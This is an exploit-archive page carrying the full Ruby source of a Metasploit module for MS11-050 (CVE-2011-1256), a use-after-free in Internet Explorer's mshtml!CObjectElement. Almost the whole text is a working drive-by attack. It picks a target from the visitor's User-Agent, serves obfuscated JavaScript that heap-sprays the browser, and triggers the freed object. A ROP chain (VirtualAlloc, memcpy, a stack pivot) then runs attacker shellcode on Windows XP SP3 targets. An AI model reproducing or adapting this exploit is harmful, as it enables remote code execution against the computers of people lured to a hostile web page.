[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MS11-050 IE mshtml!CObjectElement Use After Free
# Published : 2011-06-17
# Author : metasploit
# Previous Title : IBM Tivoli Endpoint Manager POST Query Buffer Overflow
# Next Title : Black Ice Cover Page SDK insecure method DownloadImageFileURL() exploit


			
### $Id: ms11_050_mshtml_cobjectelement.rb 12962 2011-06-17 01:56:20Z swtornio $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##require 'msf/core'class Metasploit3 < Msf::Exploit::Remote	Rank = GreatRanking	include Msf::Exploit::Remote::HttpServer::HTML	include Msf::Exploit::Remote::BrowserAutopwn	autopwn_info({		:ua_name    => HttpClients::IE,		:ua_minver  => "7.0",		:ua_maxver  => "8.0",		:javascript => true,		:os_name    => OperatingSystems::WINDOWS,		:vuln_test  => nil, 	})	def initialize(info={})		super(update_info(info,			'Name'           => "MS11-050 IE mshtml!CObjectElement Use After Free",			'Description'    => %q{					This module exploits a use-after-free vulnerability in Internet Explorer. The				vulnerability occurs when an invalid <object> tag exists and other elements overlap/cover				where the object tag should be when rendered (due to their styles/positioning). The				mshtml!CObjectElement is then freed from memory because it is invalid. However, the				mshtml!CDisplay object for the page continues to keep a reference to the freed <object> and				attempts to call a function on it, leading to the use-after-free.			},			'License'        => MSF_LICENSE,			'Version'        => "$Revision: 12962 $",			'Author'         =>				[					'd0c_s4vage',				],			'References'     =>				[					['CVE', '2011-1256'],					['OSVDB', '72948'],					['MSB', 'MS11-050'],					['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html'],				],			'DefaultOptions' =>				{					'EXITFUNC' => 'process',					'InitialAutoRunScript' => 'migrate -f',				},			'Payload'        =>				{					'Space'    => 500,					'BadChars' => "/x00/x09/x0a/x0d'//",					'StackAdjustment' => -3500,				},			'Platform'       => 'win',			'Targets'        =>				[					[ 'Automatic', { } ],					# In IE6 the mshtml!CObjectElement size is 0xac					[						'Win XP SP3 Internet Explorer 7', # 7.0.5730.13						{							# sizeof(mshtml!CObjectElement)							'FreedObjSize' =>  0xb0,							'FakeObjCount' => 0x4000,							'FakeObjCountKeep' => 0x2000,							'ForLoopNumObjects' => 3,							'FreedObjOverwritePointer'=>0x0c0c0c0c,							'FreedObjOffsetAlignSize'=>0,							'ROP' => false,						}					],					[						'Win XP SP3 Internet Explorer 8 (no DEP)', # 8.0.6001.18702						{							# sizeof(mshtml!CObjectElement)							'FreedObjSize' =>  0xe0, # 0xdc rounded up							'FakeObjCount' => 0x8000,							'FakeObjCountKeep' => 0x3000,							'ForLoopNumObjects' => 5,							'FreedObjOverwritePointer'=>0x0c0c0c0c,							'FreedObjOffsetAlignSize'=>0,							'ROP' => false,						}					],					[						'Win XP SP3 Internet Explorer 8',						{							'FreedObjSize' =>  0xe0, # 0xdc rounded up							'FakeObjCount' => 0x8000,							'FakeObjCountKeep' => 0x3000,							'ForLoopNumObjects' => 5,							'FreedObjOverwritePointer'=>0x0c0c0c0c,							'FreedObjOffsetAlignSize'=>2,							#'StackPivot'=>0x773E3F18, # xchg eax,esp / ret - comctl32.dll							'StackPivot' => 0x7E45F257, #xchg eax,esp - USER32.dll							'ROP' => true,						}					],					[						'Debug Target (Crash)', {}					],				],			'DisclosureDate' => "Jun 16 2011",			'DefaultTarget'  => 0))	end	def auto_target(cli, request)		agent = request.headers['User-Agent']		if agent =~ /MSIE 8/.0/			mytarget = targets[3] # IE 8		elsif agent =~ /MSIE 7/.0/			mytarget = targets[1]		else			print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")		end		mytarget	end	# 3/22/2011	# fully patched x32 WinXP SP3, IE 8.0.6001.18702	def winxp_sp3_rva		{			#"kernel32!VirtualAlloc"  => 0x7c809af1,			"kernel32!VirtualAlloc" => 0x7c809ae1,			"ntdll!memcpy"           => 0x7c901db3,		}	end	def compile_rop(rop_stack)		rva = winxp_sp3_rva()		num_random = 0		rop_stack.map do |rop_val|			case rop_val			when String				if rop_val == "random"					# useful for debugging					# num_random += 1					# 0xaabbcc00 + num_random					rand(0xffffffff)				else					raise RuntimeError, "Unable to locate key: #{rop_val.inspect}" unless rva[rop_val]					rva[rop_val]				end			when Integer				rop_val			else				raise RuntimeError, "unknown rop_val: #{rop_val.inspect}, #{rop_val.class}"			end		end.pack("V*")	end	def on_request_uri(cli, request)		mytarget = target		if target.name == 'Automatic'			mytarget = auto_target(cli, request)			unless mytarget				send_not_found(cli)				return			end		end		@mytarget = mytarget		@debug = true if mytarget == targets[4]		return if ((p = regenerate_payload(cli)) == nil)				id_name  = rand_text_alpha(5)		dir_name = rand_text_alpha(3)		if @debug			data = <<-DATA			<html>			<body>			<script language='javascript'>			document.body.innerHTML += "<object align='right' hspace='1000' width='1000'></object>";			document.body.innerHTML += "<a id='#{id_name}' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' ></a>";			document.body.innerHTML += "AAAAAAA";			document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='#{dir_name}'></strong>";			</script>			</body>			</html>			DATA			print_status("Triggering #{self.name} vulnerability at #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")			send_response(cli, data, { 'Content-Type' => 'text/html' })			return		end		raw_shellcode = payload.encoded		shellcode = Rex::Text.to_unescape(raw_shellcode, Rex::Arch.endian(mytarget.arch))		spray = nil		rop_shellcode_spray = nil		obj_overwrite_ptr = [@mytarget['FreedObjOverwritePointer']].pack("V")		if @mytarget['ROP']			rop_stack = []			0x1f.times do |i|				rop_stack << "random"			end			idx = -1			idx += 1 ; rop_stack[idx] = "kernel32!VirtualAlloc"   # 1:			idx += 1 ; rop_stack[idx] = "ntdll!memcpy"            # 2:ret 10 to this after VirtualAlloc			idx += 1 ; rop_stack[idx] = 0x7f000000                # 1:VirtualAlloc:lpAddress			idx += 1 ; rop_stack[idx] = 0x4000                    # 1:VirtualAlloc:dwSize			idx += 1 ; rop_stack[idx] = (0x1000 | 0x2000)         # 1:VirtualAlloc:flAllocationType MEM_COMMIT | MEM_RESERVE			idx += 1 ; rop_stack[idx] = 0x40                      # 1:VirtualAlloc:flProtect rwx			idx += 1 ; rop_stack[idx] = 0x7f001000                # 3:into this after memcpy			idx += 1 ; rop_stack[idx] = 0x7f001000                # 2:memcpy:dst			idx += 1 ; rop_stack[idx] = 0x23000100                # 2:memcpy:src			idx += 1 ; rop_stack[idx] = 0x2fff                    # 2:memcpy:size			# align the rest of it			back = rop_stack.slice!((rop_stack.length-1)-2, rop_stack.length)			rop_stack = back + rop_stack			rop_stack << @mytarget['StackPivot']			# align the stack for 0c0c0c0c			front = rop_stack.slice!(0, 19)			rop_stack = rop_stack + front			# resolve strings in the rop_stack array (kernel32!VirtualAlloc, random, etc)			rop = compile_rop(rop_stack)			nops = make_nops(0x1000 - raw_shellcode.length)			nops = Rex::Text.to_unescape(nops, Rex::Arch.endian(mytarget.arch))			#spray up to 0x23000000			rop_shellcode_spray = <<-JS			var shellcode = unescape("#{shellcode}");			var nops = unescape("#{nops}");			while(nops.length < 0x1000) nops += nops;				var shell_heapblock = nops.substring(0, 0x800-shellcode.length) + shellcode;				while(shell_heapblock.length < 0x40000) shell_heapblock += shell_heapblock;					var shell_finalspray = shell_heapblock.substring(0, (0x20000-6)/2);					for(var shell_counter = 0; shell_counter < 0x1000; shell_counter++) { heap_obj.alloc(shell_finalspray); }			JS			spray = rop			shellcode = ""		else			spray = obj_overwrite_ptr		end		spray = Rex::Text.to_unescape(spray, Rex::Arch.endian(mytarget.arch))		js = <<-JS		heap_obj = new heapLib.ie(0x20000);		var heapspray = unescape("#{spray}");		while(heapspray.length < 0x1000) heapspray += heapspray;			var shellcode = unescape("#{shellcode}");			var heapblock = heapspray.substring(0, (0x800-shellcode.length)) + shellcode;			var offset = #{[targets[1], targets[2]].include?(@mytarget) ? "0x400" : "0"};			var front = heapblock.substring(0, offset);			var end = heapblock.substring(offset);			heapblock = end + front;			while(heapblock.length < 0x20000) heapblock += heapblock;				finalspray = heapblock.substring(0, (0x10000-6)/2);				for(var counter1 = 0; counter1 < 0x1000; counter1++) { heap_obj.alloc(finalspray); }				#{rop_shellcode_spray}				var obj_overwrite = unescape("#{Rex::Text.to_unescape(obj_overwrite_ptr, Rex::Arch.endian(mytarget.arch))}");				while(obj_overwrite.length < #{@mytarget['FreedObjSize']}) { obj_overwrite += obj_overwrite; }				obj_overwrite = obj_overwrite.slice(0, (#{@mytarget['FreedObjSize']}-6)/2);				for(var num_objs_counter = 0; num_objs_counter < #{@mytarget['ForLoopNumObjects']}; num_objs_counter++) {					document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";				}				for(var counter4 = 0; counter4 < #{@mytarget['FakeObjCountKeep']}; counter4++) { heap_obj.alloc(obj_overwrite, "keepme1"); }				for(var counter5 = 0; counter5 < #{@mytarget['FakeObjCountKeep']}; counter5++) { heap_obj.alloc(obj_overwrite, "keepme2"); }				document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";				document.body.innerHTML += "AAAA";				document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";		JS		js = heaplib(js)		js = ::Rex::Exploitation::JSObfu.new(js)		js.obfuscate		html = <<-HTML		<html>		<body>		<script language='javascript'>		#{js}		</script>		</body>		</html>		HTML		print_status("Sending exploit for #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")		send_response(cli, html, {'Content-Type'=>'text/html'})	endend